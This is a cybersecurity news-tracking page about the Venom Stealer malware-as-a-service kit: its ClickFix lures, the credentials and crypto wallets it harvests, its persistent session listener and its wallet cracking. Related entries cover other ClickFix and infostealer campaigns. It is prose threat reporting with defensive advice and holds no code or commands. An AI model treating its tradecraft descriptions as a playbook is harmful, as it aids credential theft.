CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Venom Stealer infostealer kit introduces continuous credential harvesting via malware-as-a-service model

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

A newly identified infostealer malware kit named Venom Stealer is offered as a malware-as-a-service (MaaS) subscription priced at $250 per month or $1,800 lifetime, enabling continuous credential harvesting and wallet cracking operations. The kit targets Windows and macOS systems via deceptive social engineering lures integrated into its operator panel, including fake Cloudflare CAPTCHA pages, OS update prompts, SSL certificate errors, and font installation pages. Victims are tricked into executing commands via Run dialog or Terminal, bypassing detection systems by appearing user-initiated. Upon execution, it extracts and exfiltrates browser credentials, session cookies, browsing history, autofill data, cryptocurrency wallet vaults, browser extension data, and system fingerprints from Chromium and Firefox browsers. Venom Stealer distinguishes itself by maintaining silent persistence through a background session listener that reports new credentials and wallet activity to command-and-control infrastructure twice daily, and by continuously monitoring Chrome's login database to capture newly saved credentials in real time. Exfiltrated cryptocurrency wallet data is processed by a server-side GPU cracking engine, with funds automatically transferred across multiple blockchain networks including tokens and DeFi positions, undermining password rotation and incident response efforts.

Timeline

  1. 31.03.2026 17:51 2 articles · 1d ago

    Venom Stealer introduces continuous credential harvesting with background session listener in March 2026

    The Venom Stealer infostealer kit was updated in March 2026 to include a silent background session listener that reports new credentials and cryptocurrency wallet activity to command-and-control infrastructure twice daily. This update transforms the infostealer from a traditional steal-and-depart tool into a persistent surveillance and data harvesting platform, undermining password rotation policies and incident response timelines. New details from April 1, 2026 indicate that Venom Stealer now integrates ClickFix social engineering directly into its operator panel, automating the attack chain via deceptive webpages such as Cloudflare CAPTCHA, OS update prompts, SSL certificate errors, or font installation pages. Victims are tricked into executing commands via Run dialog or Terminal to bypass detection systems. The malware performs system fingerprinting and collects browser extension data to create detailed profiles of infected systems. Additionally, post-infection operations include continuous monitoring of Chrome's login database for real-time credential capture and server-side GPU cracking of cryptocurrency wallets with automatic fund transfers across multiple blockchain networks including tokens and DeFi positions.

    Show sources
    Open in new tab

Information Snippets

  • Venom Stealer is distributed as a malware-as-a-service (MaaS) subscription priced at $250 per month or $1,800 for lifetime access, with updates provided under license.

    First reported: 31.03.2026 17:51
    2 sources, 2 articles
    Show sources

  • The infostealer bypasses Chrome v10 and v20 password encryption by extracting decryption keys via silent privilege escalation without triggering UAC prompts or leaving forensic artifacts.

    First reported: 31.03.2026 17:51
    1 source, 1 article
    Show sources

  • Venom Stealer targets Chromium and Firefox browsers, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from all browser profiles.

    First reported: 31.03.2026 17:51
    1 source, 1 article
    Show sources

  • A continuous background session listener was added in March 2026, reporting new credentials and cryptocurrency wallet activity to command-and-control infrastructure twice daily to bypass password rotation and incident response measures.

    First reported: 31.03.2026 17:51
    2 sources, 2 articles
    Show sources

  • The infostealer includes automated cracking support for cryptocurrency wallets including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper, with exfiltrated funds automatically swept across nine chains including ERC-20/SPL tokens and DeFi positions.

    First reported: 31.03.2026 17:51
    1 source, 1 article
    Show sources

  • Venom Stealer integrates ClickFix social engineering directly into its operator panel, automating the attack chain from infection to data theft via fake webpages such as Cloudflare CAPTCHA, OS update prompts, SSL certificate errors, or font installation pages.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • Victims are tricked into executing commands via Run dialog or Terminal, making the infection appear user-initiated to bypass detection systems.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • The malware performs system fingerprinting and collects browser extension data to create detailed profiles of infected systems.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • After infection, Venom Stealer continuously monitors Chrome's login database to capture newly saved credentials in real time, extending credential harvesting beyond initial exfiltration.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • Cryptocurrency wallet data is sent to a server-side cracking engine running on GPU infrastructure, with cracked funds automatically transferred across multiple blockchain networks including tokens and DeFi positions.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • Venom Stealer includes automated ClickFix delivery templates for both Windows and macOS platforms.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

  • Attack chains can be disrupted by restricting PowerShell execution, disabling the Run dialog for standard users, training employees to recognize ClickFix-style social engineering, and monitoring outbound network traffic for immediate data exfiltration.

    First reported: 01.04.2026 16:30
    1 source, 1 article
    Show sources

Similar Happenings

Torg Grabber infostealer expands to 850 browser extensions including 728 crypto wallets

A new info-stealing malware family named Torg Grabber has been identified targeting 850 browser extensions, with over 700 focused on cryptocurrency wallets. Initial access is achieved via the ClickFix technique, involving clipboard hijacking and user tricked into executing malicious PowerShell commands. The malware rapidly evolves, with 334 unique samples compiled in three months and weekly registration of new command-and-control (C2) servers. Torg Grabber employs advanced anti-analysis, multi-layered obfuscation, direct syscalls, and reflective loading to evade detection. It exfiltrates data over HTTPS via Cloudflare, supports chunked uploads, and includes mechanisms to bypass browser cookie protection. The malware targets credentials, cookies, autofill data, and files from 25 Chromium-based browsers and 8 Firefox variants, alongside a wide range of applications including password managers, 2FA tools, messaging platforms, VPNs, and desktop crypto wallets.

Open in new tab

ErrTraffic Service Enables Automated ClickFix Attacks via Fake Browser Glitches

A new cybercrime tool called ErrTraffic automates ClickFix attacks by generating fake browser glitches on compromised websites to trick users into downloading malware or following malicious instructions. The service promises high conversion rates and delivers architecture-specific payloads. ClickFix attacks have gained popularity among cybercriminals and state-sponsored actors for bypassing security controls. ErrTraffic is sold for a one-time purchase of $800 and offers a user-friendly panel for campaign management. It modifies the DOM of compromised websites to display visual glitches, prompting victims to execute malicious commands. Payloads include Lumma and Vidar info-stealers on Windows, Cerberus trojan on Android, AMOS stealer on macOS, and unspecified Linux backdoors.

Open in new tab

Increased Use of ClickFix Attacks by Threat Actors

ClickFix attacks, where users are tricked into running malicious commands by copying code from a webpage, have become a significant source of security breaches. These attacks are used by various threat actors, including the Interlock ransomware group and state-sponsored APTs. Recent data breaches at Kettering Health, DaVita, City of St. Paul, and Texas Tech University Health Sciences Centers have been linked to ClickFix-style tactics. A new variant of ClickFix attacks has emerged, targeting cryptocurrency users by abusing Pastebin comments to distribute malicious JavaScript. This attack tricks users into executing code that hijacks Bitcoin swap transactions, redirecting funds to attacker-controlled wallets. The campaign relies on social engineering that promises large profits from a supposed Swapzone.io arbitrage exploit, but instead runs malicious code that modifies the swap process directly within the victim's browser. The attacks exploit user behavior and technical gaps in detection to evade security measures and are delivered through SEO poisoning, malvertising, and other non-email vectors, making them harder to detect and prevent. Effective defense against ClickFix attacks requires browser-based detection and blocking to intercept these threats at the earliest opportunity.

Open in new tab

COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware

The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These malware families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors, despite their lack of technical sophistication. The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns. The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025. The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re 'not a robot'. The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry. The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence. The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems. The group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly. The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. The campaign began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command, installing malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services. The latest incidents were reported in May and June 2025 by two organizations, including Reporters Without Borders (RSF). The group is known for impersonating trusted contacts and prompting targets to request missing or malfunctioning attachments. In one case involving RSF in March 2025, a ProtonMail address mimicking a legitimate contact sent a French-language email asking a core member to review a document. No file was attached. When the member requested it, the operators replied in English with a link routed through a compromised website to a ProtonDrive URL. However, the file itself could not be retrieved because ProtonMail had blocked the associated account. A second victim received a file labeled as a PDF that was actually a ZIP archive disguised with a .pdf extension. The final stage of the attack used a typical Calisto decoy PDF that claimed to be encrypted and instructed the user to open it in ProtonDrive. The link again sent the target through a redirector hosted on a compromised website. The phishing kit analyzed by TDR, located on account.simpleasip[.]org, appeared to be custom built. It targeted ProtonMail accounts using an Adversary-in-the-Middle (AiTM) setup that relays two-factor authentication (2FA). Analysts found injected JavaScript designed to keep the cursor locked to the password field and to interact with an attacker-controlled API for handling CAPTCHA and 2FA prompts. Star Blizzard's infrastructure included servers hosting phishing pages and others serving as API endpoints. Many domains were tied to Namecheap services, while some earlier ones were registered via Regway to help analysts track the cluster over time.

Open in new tab

Scattered Spider's Browser-Based Attacks and Mitigation Strategies

Scattered Spider, also known as UNC3944, Octo Tempest, or Muddled Libra, has evolved to target browser environments, exploiting vulnerabilities in web applications accessed via Chrome, Edge, Firefox, and other browsers. This group focuses on stealing sensitive data such as credentials, session tokens, and security tokens. Over 80% of security incidents now originate from these web applications, making browser security a critical concern for enterprises. Scattered Spider employs sophisticated techniques like Browser-in-the-Browser overlays, session token theft, and malicious extensions to evade traditional security tools. To counter these threats, CISOs must implement multi-layered browser security strategies, including runtime script protection, session integrity, extension governance, and browser telemetry integration.

Open in new tab